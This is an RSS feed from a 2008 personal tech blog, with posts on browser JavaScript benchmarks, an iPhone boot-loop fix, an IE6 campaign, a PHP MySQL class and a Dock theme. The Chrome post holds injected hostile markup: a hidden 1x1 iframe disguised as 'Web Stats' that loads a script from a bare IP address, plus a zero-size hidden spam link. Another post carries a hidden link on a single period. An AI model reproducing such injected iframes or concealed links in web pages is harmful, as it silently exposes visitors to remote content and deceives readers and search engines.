<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>innovation initiative</title>
	<atom:link href="http://blog.zydev.info/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.zydev.info</link>
	<description>zydev.info — crazy talk of the insane</description>
	<pubDate>Sun, 14 Jun 2009 11:42:35 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
			<item>
		<title>Javascript Performance: Google Chrome, Firefox &#038; Safari</title>
		<link>http://blog.zydev.info/2008/09/03/javascript-performance-google-chrome-firefox-safari/</link>
		<comments>http://blog.zydev.info/2008/09/03/javascript-performance-google-chrome-firefox-safari/#comments</comments>
		<pubDate>Wed, 03 Sep 2008 19:02:29 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/?p=132</guid>
		<description><![CDATA[Today I&#8217;ve been playing with Google&#8217;s new web browser, Google Chrome. So far I have to admit I&#8217;m very impressed. Specially about the new JavaScript engine called V8, as it even leaves WebKit&#8217;s new erbium doped fiber amplifierSquirrelFish JS engine eating dust.
Here&#8217;s the results from my most likely very-unscientific JS performance tests using Dromaeo. All [...]]]></description>
			<content:encoded><![CDATA[<p>Today I&#8217;ve been playing with Google&#8217;s new web browser, <a href="http://www.google.com/chrome/">Google Chrome</a>. So far I have to admit I&#8217;m very impressed. Specially about the new JavaScript engine called V8, as it even leaves <a href="http://webkit.org/">WebKit</a>&#8217;s new <a href="http://webkit.org/blog/189/announcing-squirrelfish/"><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://vtsc.info/en/publication/">erbium doped fiber amplifier</a></font>SquirrelFish</a> JS engine eating dust.</p>
<p>Here&#8217;s the results from my most likely very-unscientific JS performance tests using <a href="http://dromaeo.com/">Dromaeo</a>. All tests were done within minutes of each other, during equal system loads on a 1.8 GHz Core 2 Duo machine running XP SP2 (work machine, as I only have Macs myself).</p>
<p><img src="http://blog.zydev.info/wp-content/uploads/2008/09/browser-js-test-chart.png" alt="" title="Browser JS Performance Chart" width="436" height="266" class="aligncenter size-full wp-image-141" /></p>
<p>Here&#8217;s the detailed test results:<br />
<a href="http://dromaeo.com/?id=31749,31679,31717,31597,31599">http://dromaeo.com/?id=31749,31679,31717,31597,31599</a></p>
<p>Google<!-- Web Stats --> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats --> Chrome registers as &#8220;Safari/525.13&#8243; since they both use the WebKit rendering engine.</p>
<p>Best Dromaeo results I&#8217;ve seen with Google Chrome is 180ms on a friend&#8217;s 2.66 GHz Core 2 Quad system.</p>
<p>P.S. Yes, that chart was created using MS Office, rather than Keynote or something, as my MacBook Pro is still in the UK getting repaired. But more on that later <img src='http://blog.zydev.info/wp-includes/images/smilies/tongue.gif' alt=':P' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/09/03/javascript-performance-google-chrome-firefox-safari/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Fix for the never-ending Apple logo during iPhone boot problem</title>
		<link>http://blog.zydev.info/2008/08/30/fix-for-the-never-ending-apple-logo-during-iphone-boot-problem/</link>
		<comments>http://blog.zydev.info/2008/08/30/fix-for-the-never-ending-apple-logo-during-iphone-boot-problem/#comments</comments>
		<pubDate>Sat, 30 Aug 2008 20:54:23 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[iPhone]]></category>

		<category><![CDATA[apple]]></category>

		<category><![CDATA[fix]]></category>

		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/?p=116</guid>
		<description><![CDATA[So, the last few days, I&#8217;ve had a quite weird issue with my iPhone. It locks up, and after a force reset, it never does anything else than showing the Apple logo. However, it does connect to Wifi for about 5 minutes so i can SSH into the phone.
So far, I&#8217;ve been resetting the phone [...]]]></description>
			<content:encoded><![CDATA[<p>So, the last few days, I&#8217;ve had a quite weird issue with my iPhone. It locks up, and after a force reset, it never does anything else than showing the Apple logo. However, it does connect to Wifi for about 5 minutes so i can SSH into the phone.</p>
<p>So far, I&#8217;ve been resetting the phone from scratch, but with help from <i>eric</i> in #iphone on irc.saurik.com I managed to figure out a solution.</p>
<p>For now I&#8217;m just gonna write up the steps required to fix it. I&#8217;ll update the post later with details of why and how this happens.</p>
<p><b>The Fix</b><br />
First of all, your phone still has to connect to your wifi network so you get SSH access, even tho it&#8217;s still only displaying the Apple logo. It will probably disable wifi after about 5 minutes, so you gotta move faster than a snail at least.</p>
<p><span style="color: red">Don&#8217;t try this if you don&#8217;t know what you&#8217;re doing. Also, this is for the 2.0/2.1 iPhone software, but might also work on 1.x.</span></p>
<ol>
<li>SSH into the phone as <i>root</i>, cd to <i>/System/Library/SystemConfiguration/</i> and rename <i>mobilewatchdog.bundle</i> to <i>mobilewatchdog.bundle_x</i>.</li>
<li>cd to <i>/private/var/mobile/Library/Caches/</i> and remove any files which names begin with <i>&#8220;com.apple.mobile.installation&#8221;</i>.</li>
<li>Reboot the phone, and like magic it should start up like normal, in 2-15 minutes depending on how many apps you have installed.</li>
<li>SSH in again and rename the <i>mobilewatchdog.bundle_x</i> folder back to <i>mobilewatchdog.bundle</i> in <i>/System/Library/SystemConfiguration/</i>, and reboot.</li>
</ol>
<p><b>The Cause</b><br />
The problem&#8217;s root is a combination of how App Store apps are stored on the phone, and a safety process called mobilewatchdog which ensures that the Springboard doesn&#8217;t lock up.</p>
<p>Myself, I&#8217;ve mainly had it triggered by installing an app with Cydia which has a Springboard icon. As you surely have noticed, Cydia on iPhone software 2.0.x doesn&#8217;t need to restart the Springboard anymore for new applications to show. It seems to use a similar method as the App Store to dynamically create new application icons.</p>
<p>The problem is that sometimes when Cydia adds an application icon, the Springboard flips out and looses it&#8217;s cached list of installed applications. That list is required cause the App Store apps are stored in they&#8217;re own little sandbox protected folders, which means that it&#8217;s a bit more complicated than just getting a directory listing to see which applications are installed. And it takes some time to scan for all installed applications.</p>
<p>And that&#8217;s where the problem starts. There&#8217;s a background daemon called mobilewatchdog, who&#8217;s sole purpose is to make sure that the Springboard does not crash or lock up. In the event of the Springboard locking up or crashing, mobilewatchdog will force quit and relaunch it. Sounds good right? Right, as long as the Springboard doesn&#8217;t have to rescan for installed applications.</p>
<p>As it seems, when the Springboard scans for applications, it&#8217;s too busy to respond to mobilewatchdog&#8217;s checks. And mobilewatchdog being very impatient, only waits 2 seconds for an answer from Springboard. So if it doesn&#8217;t get a response within 2 seconds, it force quits the Springboard and relaunches it. At this point, Springboard just starts rescanning for installed applications again and gets to busy to respond to mobilewatchdog again, and the circule continues for all eternity.</p>
<p>So the solution was pretty obvious. Disable mobilewatchdog temporarily so Springboard get&#8217;s time to find all installed applications. I originally tried some plist configurations as was suggested by syslog dumps from the mobilewatchdog daemon itself, they didn&#8217;t work tho. So being desperate, and crazy, I simply renamed the mobilewatchdog bundle rendering it unusable, hoping that its launched simply based on file name, and nothing else fails due to it referencing it. Luckily enough, it works.</p>
<p>Springboard was given enough time to find all my installed applications and launch like normal. It had however missed a few apps, so I went looking for the cached list of installed apps, which was where I expected it to be. In <i>/private/var/mobile/Library/Caches/</i>. Removing the cache files forces Springboard to scan for apps again, and with mobilewatchdog out of the picture, it works perfectly.</p>
<p><s>I&#8217;ve only tested this on 2.0.2, but should be exactly the same for all 2.0.x software.</s> I&#8217;ve tested this on both 2.0.2 and 2.1 with success. I have had the same issue on 1.1.4 tho when using Installer. However, I don&#8217;t know if its the same issue or not. If this happens to work for the same issue on 1.x, please let me know <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>It was thanks to eric in #iphone on irc.saurik.com that i figured out this solution. He had previously had this issue, and worked with saurik to figure out what was going on. Without being pointed in the right direction, I wouldn&#8217;t have had a clue of where to start, and just ended up swearing my head off and resetting my iPhone yet again.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/08/30/fix-for-the-never-ending-apple-logo-during-iphone-boot-problem/feed/</wfw:commentRss>
		</item>
		<item>
		<title>SJF gives the finger to IE6</title>
		<link>http://blog.zydev.info/2008/08/26/sjf-gives-the-finger-to-ie6/</link>
		<comments>http://blog.zydev.info/2008/08/26/sjf-gives-the-finger-to-ie6/#comments</comments>
		<pubDate>Tue, 26 Aug 2008 20:38:13 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Development]]></category>

		<category><![CDATA[Modern Bubbling]]></category>

		<category><![CDATA[Steve Jobs Facts]]></category>

		<category><![CDATA[ie6]]></category>

		<category><![CDATA[iedeathmarch]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/?p=109</guid>
		<description><![CDATA[Dave, the co-creator of our Steve Jobs Facts project has just launched IE Death March.
&#8220;Internet Explorer 6 will be SEVEN years old on August 27th. It came out a few weeks before the Twin Towers fell. It came out before the Nintendo GameCube. It came out before the first iPod.
It’s time to put a deadline [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://prototypecreative.com/blog/">Dave</a>, the co-creator of our <a href="http://stevejobsfacts.com/">Steve Jobs Facts</a> project has just launched <a href="http://iedeathmarch.org/">IE Death March</a>.</p>
<p><i><b>&#8220;Internet Explorer 6 will be SEVEN years old on August 27th. It came out a few weeks before the Twin Towers fell. It came out before the Nintendo GameCube. It came out before the first iPod.</p>
<p>It’s time to put a deadline on dropping IE6, and I say that time is now, and the deadline should be soon… say like, March 2009. That’s roughly a little more than 6 months.&#8221;</b></i></p>
<p>So, we&#8217;ve officially stopped supporting IE6 regarding SJF. From this point on we wont be testing any changes to the site in IE6. Not that it ever worked properly in IE6, but it does (for now) work at least.</p>
<p>Both me and Dave are, like IE Death March states, planning on halting all support for IE6 in our development efforts by March 2009. Hopefully IE Death March catches on and inspires more developers, and front line web-services to also halt supporting IE6, and encouraging more users to update to IE7 or switch to a better more modern browser.</p>
<p>IE6 has for many years a been filter of creativity with web development for me, and many others, here&#8217;s me hoping it wont be so in six months time.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/08/26/sjf-gives-the-finger-to-ie6/feed/</wfw:commentRss>
		</item>
		<item>
		<title>More Twitter, Less Blogging</title>
		<link>http://blog.zydev.info/2008/07/22/more-twitter-less-blogging/</link>
		<comments>http://blog.zydev.info/2008/07/22/more-twitter-less-blogging/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 20:56:11 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Other]]></category>

		<category><![CDATA[blogging]]></category>

		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2008/07/22/more-twitter-less-blogging/</guid>
		<description><![CDATA[Has anyone else noticed that they tend to blog less since becoming a Twitter addict? I sure have&#8230;
I&#8217;m planning on fixing this by first of all including my Twitter feed on the blog one way or another. And then of course, to also focus more on blogging itself.
It&#8217;s just so quick and easy to get [...]]]></description>
			<content:encoded><![CDATA[<p>Has anyone else noticed that they tend to blog less since becoming a <a href="http://twitter.com/">Twitter</a> addict? I sure have&#8230;</p>
<p>I&#8217;m planning on fixing this by first of all including my Twitter feed on the blog one way or another. And then of course, to also focus more on blogging itself.</p>
<p>It&#8217;s just so quick and easy to get your thoughts out using Twitter. You&#8217;re limited to 160 characters, so there&#8217;s no point or need to write a draft, then review and/or edit it before you post your +500 word rant/review/news/whatever to the world.</p>
<p>Also, in my case, I&#8217;ve got an iPhone, which just makes Twitter even more addictive cause you&#8217;ve always got access to it 24/7 no matter where you are.</p>
<p>But now I&#8217;ve also got quick and easy access to my blog here thanks to the iPhone native WordPress app. Which means I don&#8217;t have to worry about how much GPRS is gonna cost to load up my blog in Safari to post something.</p>
<p>I think I&#8217;m gonna start blogging more along the Twitter style, like this post I&#8217;m writing now on my iPhone using the WordPress app. So please excuse any spelling and/or grammatical errors <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/07/22/more-twitter-less-blogging/feed/</wfw:commentRss>
		</item>
		<item>
		<title>WordPress for iPhone</title>
		<link>http://blog.zydev.info/2008/07/22/wordpress-for-iphone/</link>
		<comments>http://blog.zydev.info/2008/07/22/wordpress-for-iphone/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 12:44:36 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Software]]></category>

		<category><![CDATA[iPhone]]></category>

		<category><![CDATA[app]]></category>

		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/?p=93</guid>
		<description><![CDATA[I just installed the WordPress app for the iPhone. And I have to admit it&#8217;s pretty damn nice, but could use some polish and feature additions. But hey, it&#8217;s the initial release, and I&#8217;m looking forward to seeing what will become of this app in the future  
Also, nevermind the post where I announce [...]]]></description>
			<content:encoded><![CDATA[<p>I just installed the WordPress app for the iPhone. And I have to admit it&#8217;s pretty damn nice, but could use some polish and feature additions. But hey, it&#8217;s the initial release, and I&#8217;m looking forward to seeing what will become of this app in the future <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Also, nevermind the post where I announce Pwnage Tool 2.0 has gone wild, and my successfull pwning. I&#8217;ll post about that later&#8230;</p>
<p>Oh and by the way, I&#8217;m writing this on my iPhone <img src='http://blog.zydev.info/wp-includes/images/smilies/grin.gif' alt=':D' class='wp-smiley' /> </p>
<div align="center"><a href="http://blog.zydev.info/wp-content/uploads/2008/07/p-480-320-2bce7b86-2f7a-42bc-8c35-33bed4a8ce1d.jpeg" rel="roebox[93]"><img src="http://blog.zydev.info/wp-content/uploads/2008/07/p-480-320-2bce7b86-2f7a-42bc-8c35-33bed4a8ce1d.jpeg" alt="photo" width="200" height="300" class="alignnone size-full wp-image-364 reflect rheightpx32" /></a></div>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/07/22/wordpress-for-iphone/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Steve Jobs Facts</title>
		<link>http://blog.zydev.info/2008/06/07/steve-jobs-facts/</link>
		<comments>http://blog.zydev.info/2008/06/07/steve-jobs-facts/#comments</comments>
		<pubDate>Sat, 07 Jun 2008 19:23:34 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Announcements]]></category>

		<category><![CDATA[Design]]></category>

		<category><![CDATA[Development]]></category>

		<category><![CDATA[Projects]]></category>

		<category><![CDATA[Steve Jobs Facts]]></category>

		<category><![CDATA[bash.org]]></category>

		<category><![CDATA[chuck norris]]></category>

		<category><![CDATA[facts]]></category>

		<category><![CDATA[steve jobs]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/?p=88</guid>
		<description><![CDATA[Yepp, its what it sounds like, its stevejobsfacts.com.
And with that I&#8217;m ending my six months of silence. It&#8217;s been a crazy, tiring and exhausting six months. But I&#8217;m not gonna go for months again without a word here.
Anyway, to get back on topic. Steve Jobs Facts is pretty much what it sounds like. It&#8217;s a [...]]]></description>
			<content:encoded><![CDATA[<p>Yepp, its what it sounds like, its <a href="http://stevejobsfacts.com/">stevejobsfacts.com</a>.</p>
<p>And with that I&#8217;m ending my six months of silence. It&#8217;s been a crazy, tiring and exhausting six months. But I&#8217;m not gonna go for months again without a word here.</p>
<p>Anyway, to get back on topic. <a href="http://stevejobsfacts.com/">Steve Jobs Facts</a> is pretty much what it sounds like. It&#8217;s a satirical fact index about <a href="http://en.wikipedia.org/wiki/Steve_Jobs">Steve Jobs</a>. You vote on your favorite facts, and submit your own. Think of it as the bastard child of <a href="http://chucknorrisfacts.com/">Chuck Norris Facts</a> and <a href="http://bash.org/">bash.org</a> with fancy sexiness sprinkled on top like fairy dust.</p>
<p>SJF is a project me and Dave (<a href="http://twitter.com/sxtxixtxcxh">@sxtxixtxcxh</a>) started last summer. Yes, I did say last summer. But due to circumstances, hiccups, and laziness, we never got the project ready for a launch. But this week we both decided to get SJF live before WWDC even if it killed us (not really, but sounds better than &#8220;if we fail, we suck!&#8221;, or &#8220;you suck&#8221; like Dave said it&#8230; lol).</p>
<p>The project is still very much beta/alpha though. We didn&#8217;t implement user registrations till 2 hours after we launched the site. Right now its very simple, but very usable at the same time.</p>
<p>We&#8217;ll be adding more features over the next few days, and some code cleanup behind the scenes to make things runs slightly faster and smoother. Not that anyone will notice the speed improvements though unless we get slashdotted or something *keeps fingers crossed and makes cute puppy eyes* <img src='http://blog.zydev.info/wp-includes/images/smilies/grin.gif' alt=':D' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/06/07/steve-jobs-facts/feed/</wfw:commentRss>
		</item>
		<item>
		<title>00110010 00110000 00110000 00111000</title>
		<link>http://blog.zydev.info/2008/01/01/00110010-00110000-00110000-00111000/</link>
		<comments>http://blog.zydev.info/2008/01/01/00110010-00110000-00110000-00111000/#comments</comments>
		<pubDate>Tue, 01 Jan 2008 09:08:23 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Announcements]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2008/01/01/00110010-00110000-00110000-00111000/</guid>
		<description><![CDATA[01001000 01100001 01110000 01110000 01111001 00100000 01001110 01100101 01110111 00100000 01011001 01100101 01100001 01110010 00100001 00001101 00001010 00001101 00001010 01001001 01100110 00100000 01111001 01101111 01110101 00100111 01110010 01100101 00100000 01110111 01101111 01101110 01100100 01100101 01110010 01101001 01101110 01100111 00100000 01110111 01110100 01100110 00100111 01110011 00100000 01110100 01101000 01100101 00100000 01100100 01100101 01100001 01101100 00100000 01110111 [...]]]></description>
			<content:encoded><![CDATA[<p>01001000 01100001 01110000 01110000 01111001 00100000 01001110 01100101 01110111 00100000 01011001 01100101 01100001 01110010 00100001 00001101 00001010 00001101 00001010 01001001 01100110 00100000 01111001 01101111 01110101 00100111 01110010 01100101 00100000 01110111 01101111 01101110 01100100 01100101 01110010 01101001 01101110 01100111 00100000 01110111 01110100 01100110 00100111 01110011 00100000 01110100 01101000 01100101 00100000 01100100 01100101 01100001 01101100 00100000 01110111 01101001 01110100 01101000 00100000 01110100 01101000 01101001 01110011 00100000 01100010 01101001 01101110 01100001 01110010 01111001 00100000 01110011 01101000 01101001 01110100 00101100 00100000 01110100 01101111 01100100 01100001 01111001 00100000 01101001 01110011 00100000 01001010 01100001 01101110 00100000 00110001 01110011 01110100 00101100 00100000 01101111 01110010 00100000 00110000 00110001 00101111 00110000 00110001 00100000 00111010 00101001 00001101 00001010 00001101 00001010 00101110 00101110 00101110 01100001 01101110 01100100 00100000 01111001 01100101 01110011 00101100 00100000 01001001 00100000 01110111 01100001 01110011 00100000 01100110 01100101 01100101 01101100 01101001 01101110 01100111 00100000 01110001 01110101 01101001 01110100 01100101 00100000 01100010 01101111 01110010 01100101 01100100 00100000 01110111 01101000 01100101 01101110 00100000 01101001 00100000 01110000 01101111 01110011 01110100 01100101 01100100 00100000 01110100 01101000 01101001 01110011 00100000 01011110 01011111 01011110<a href="http://zynode.info/misc/ahb.php">.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2008/01/01/00110010-00110000-00110000-00111000/feed/</wfw:commentRss>
		</item>
		<item>
		<title>LiteMySQL — A quick and simple MySQL class for PHP5</title>
		<link>http://blog.zydev.info/2007/12/13/litemysql-a-quick-and-simple-mysql-class-for-php5/</link>
		<comments>http://blog.zydev.info/2007/12/13/litemysql-a-quick-and-simple-mysql-class-for-php5/#comments</comments>
		<pubDate>Thu, 13 Dec 2007 19:57:04 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Development]]></category>

		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/12/13/litemysql-a-quick-and-simple-mysql-class-for-php5/</guid>
		<description><![CDATA[Today I released a small and quick side-project called LiteMySQL. It&#8217;s basically a PHP5 class which is designed to automate the boring repetitive tasks of opening and managing database connections, looping through the query result resource to get an array and so on.
I created this for a small project I&#8217;m working on which basically needs [...]]]></description>
			<content:encoded><![CDATA[<p>Today I released a small and quick side-project called <a href="http://code.google.com/p/litemysql/">LiteMySQL</a>. It&#8217;s basically a PHP5 class which is designed to automate the boring repetitive tasks of opening and managing database connections, looping through the query result resource to get an array and so on.</p>
<p>I created this for a small project I&#8217;m working on which basically needs database access on less than a handful of pages. And so I&#8217;d have a ready to use MySQL solution other small projects in the future.</p>
<p>And sorry for the lack of information on the project page as of now, but I gotta finish off the original project which motivated me to create LiteMySQL. Once done I&#8217;ll update the project page with relevant information <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><b>Example Usage:</b></p>
<pre># general usage
$sql = new litemysql('host', 'username', 'password', 'database', 'table');
$rows = $sql->find_all();

# conditions
# - the following three uses of the find
#   function all produce identical results
$result = $sql->find(3);
$result = $sql->find(array('id' => 3));
$result = $sql->find('`id` = 3');

# insert a single row
$sql->insert(
   array(
      'title' => 'hello world',
      'body' => 'my first blog post :D',
      'author' => 'John Doe'
   )
);</pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/12/13/litemysql-a-quick-and-simple-mysql-class-for-php5/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Intuitive WebKit based IM client coming to Windows</title>
		<link>http://blog.zydev.info/2007/12/06/intuitive-webkit-based-im-client-coming-to-windows/</link>
		<comments>http://blog.zydev.info/2007/12/06/intuitive-webkit-based-im-client-coming-to-windows/#comments</comments>
		<pubDate>Thu, 06 Dec 2007 16:39:20 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Modern Bubbling]]></category>

		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/12/06/intuitive-im-client-coming-to-windows/</guid>
		<description><![CDATA[Last night I was contacted by one of the developers from a new multi-protocol IM client called Digsby.
If you&#8217;re an avid reader of my blog (for reasons that are beyond me&#8230; lol), you probably already know why they contacted me. They asked to bundle my Modern Bubbling message style I created for Adium along with [...]]]></description>
			<content:encoded><![CDATA[<p>Last night I was contacted by one of the developers from a new multi-protocol IM client called <a href="http://www.digsby.com/">Digsby</a>.</p>
<p>If you&#8217;re an avid reader of my blog (for reasons that are beyond me&#8230; lol), you probably already know why they contacted me. They asked to bundle my <a href="http://www.adiumxtras.com/index.php?a=xtras&#038;xtra_id=3629">Modern Bubbling</a> message style I created for <a href="http://www.adiumx.com/">Adium</a> along with a few other of they&#8217;re favorites.</p>
<p>Here&#8217;s where things start to get interesting. Modern Bubbling wont need to be ported to they&#8217;re client, as they&#8217;re using the <a href="http://webkit.org/">WebKit</a> HTML rendering engine to power their message view.</p>
<p>Incase you&#8217;re not an avid geek, WebKit is Apple&#8217;s rendering engine developed for Safari a few years back. WebKit was originally based on <a href="http://www.kde.org/">KDE</a>&#8217;s <a href="http://en.wikipedia.org/wiki/KHTML">KHTML</a> engine. It&#8217;s the rendering engine that powers Safari, Mail, Dashboard, Adium&#8217;s message styles, and much more on Mac OS X.</p>
<p>So thanks to the open-source, cross-platform wonder that is WebKit, and some hard work from the development team, Digsby will support all current Adium message styles without any modifications.</p>
<p>Digsby&#8217;s goal is to create an intuitive IM client for Windows. They&#8217;re seemingly huge fans of Adium, and how well its UI is designed. And not to offend anybody, but personally I have to say no IM client for Windows which I&#8217;ve tried so far comes close to being as good and as much of a pleasure to use as Adium is on Mac OS X. And this seems to be the very problem the Digsby team seem determined to fix. <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>I&#8217;m eagerly awaiting to get my hands on the first beta to see if I wont have to be in pain anymore when using an IM client on Windows. <img src='http://blog.zydev.info/wp-includes/images/smilies/grin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Head over to <a href="http://www.digsby.com/">www.digsby.com</a> and signup for the beta mailing list.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/12/06/intuitive-webkit-based-im-client-coming-to-windows/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Shamelessly reposted from Fraeon.info</title>
		<link>http://blog.zydev.info/2007/12/05/shamelessly-reposted-from-fraeoninfo/</link>
		<comments>http://blog.zydev.info/2007/12/05/shamelessly-reposted-from-fraeoninfo/#comments</comments>
		<pubDate>Tue, 04 Dec 2007 21:06:49 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Other]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/12/05/shamelessly-reposted-from-fraeoninfo/</guid>
		<description><![CDATA[The.
]]></description>
			<content:encoded><![CDATA[<p><a href="http://fraeon.info/index.php?/archives/18-Shamelessly-reposted-from-VirginWorlds.html">The.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/12/05/shamelessly-reposted-from-fraeoninfo/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Safari doesn&#8217;t always like bz2 compressed DMG files</title>
		<link>http://blog.zydev.info/2007/12/03/safari-doesnt-always-like-bz2-compressed-dmg-files/</link>
		<comments>http://blog.zydev.info/2007/12/03/safari-doesnt-always-like-bz2-compressed-dmg-files/#comments</comments>
		<pubDate>Mon, 03 Dec 2007 15:23:21 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Mac OS X]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/12/03/safari-doesnt-always-like-bz2-compressed-dmg-files/</guid>
		<description><![CDATA[I noticed something weird this morning about the recent SimpleDock project I released last night. The DMG is compressed using bz2 rather than the default zlib compression used by default when creating compressed disk images.
Turns out Safari gets confused and guesses wrong a lot of the time with bz2 compressed disk images, and renames the [...]]]></description>
			<content:encoded><![CDATA[<p>I noticed something weird this morning about the recent <a href="http://zydev.info/simpledock/">SimpleDock</a> project I released last night. The DMG is compressed using bz2 rather than the default zlib compression used by default when creating compressed disk images.</p>
<p>Turns out Safari gets confused and guesses wrong a lot of the time with bz2 compressed disk images, and renames the downloaded file to <i>file.dmg<b>.bz2</b></i> when the server doesn&#8217;t give a DMG specific MIME type. The end result is that you have to remove the <i>.bz2</i> extension at the end or the file will be unusable. For that you actually have to know of this issue tho, which not all end-users do.</p>
<p>This problem is easily fixed however if you use Apache by simply adding the following to your <i>.htaccess</i> file:</p>
<pre>
   AddType application/x-apple-diskimage .dmg
</pre>
<p>With this fixed, i still decided to upload a new copy of SimpleDock which is compressed with zlib instead of bz2, simply cause the size difference was 14.23 KB, and Safari doesn&#8217;t have any problems with zlib compressed disk images regardless of MIME types. And also cause I wanted to make a minor change to the uninstall info file <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>The only strange thing though is that the SimpleDock download worked fine last night when i tested it, but this morning when I was testing some other stuff, I noticed it didn&#8217;t work properly anymore. </p>
<p>But oh well, it&#8217;s all fixed and working now, and I don&#8217;t feel like doing any P.I. work today&#8230; lol</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/12/03/safari-doesnt-always-like-bz2-compressed-dmg-files/feed/</wfw:commentRss>
		</item>
		<item>
		<title>SimpleDock 1.0 — a Leopard Dock modification</title>
		<link>http://blog.zydev.info/2007/12/03/simpledock-10-a-leopard-dock-modification/</link>
		<comments>http://blog.zydev.info/2007/12/03/simpledock-10-a-leopard-dock-modification/#comments</comments>
		<pubDate>Mon, 03 Dec 2007 01:28:18 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Mac OS X]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/12/03/simpledock-10-%e2%80%94-a-leopard-dock-modification/</guid>
		<description><![CDATA[
Do you not like the new default dock style of Leopard? Do you think the 3D style attracts to much attention and distracts your eye-line by not really fitting into any and almost all wallpapers? Do you find the white line around the flat style insanely annoying and ugly?
Myself I answered yes to all of [...]]]></description>
			<content:encoded><![CDATA[<div align="center"><a href='http://zydev.info/simpledock/screenshots/before-after.jpg' title='Before &#038; After' target='_blank' rel='roebox[81]'><img src='http://blog.zydev.info/wp-content/uploads/2007/12/before-after_400x244.jpg' alt='Before &#038; After' class='reflect rheightpx45' /></a></div>
<p>Do you not like the new default dock style of Leopard? Do you think the 3D style attracts to much attention and distracts your eye-line by not really fitting into any and almost all wallpapers? Do you find the white line around the flat style insanely annoying and ugly?</p>
<p>Myself I answered yes to all of these questions, which was what got me started on <a href="http://zydev.info/simpledock/">SimpleDock</a> a few weeks ago.</p>
<p>From the beginning it was just supposed to replace the flat dock style, but along the way I came across <a href="http://mitcz.com/">Rev. Mitchz</a>&#8216; Dark Glass mod for the 3D style which I fell in love with. So thanks to Mitchz&#8217; permission, I included Dark Glass in SimpleDock <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Finally tonight I decided to finish and release this project instead of getting a few hours of more than needed sleep. I&#8217;d had SimpleDock collecting dust for the past 10-14 days.</p>
<p>I&#8217;ve created an Installer and Uninstaller to make the process as smooth as possible for everyone.</p>
<p>Enjoy <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<blockquote align="center">
<h2><a href="http://zydev.info/simpledock/">Download SimpleDock</a></h2>
</blockquote>
]]></content:encoded>
